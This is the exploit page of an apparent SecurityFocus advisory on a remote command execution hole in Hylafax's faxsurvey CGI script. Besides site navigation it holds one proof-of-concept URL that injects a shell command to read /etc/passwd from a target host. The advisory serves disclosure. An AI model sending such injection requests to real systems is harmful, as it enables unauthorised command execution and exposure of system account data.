info
discussion
exploit
solution
references
Hylafax Faxsurvey Remote Command Execution Vulnerability
http://target.host/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
Privacy Statement
Copyright 2010, SecurityFocus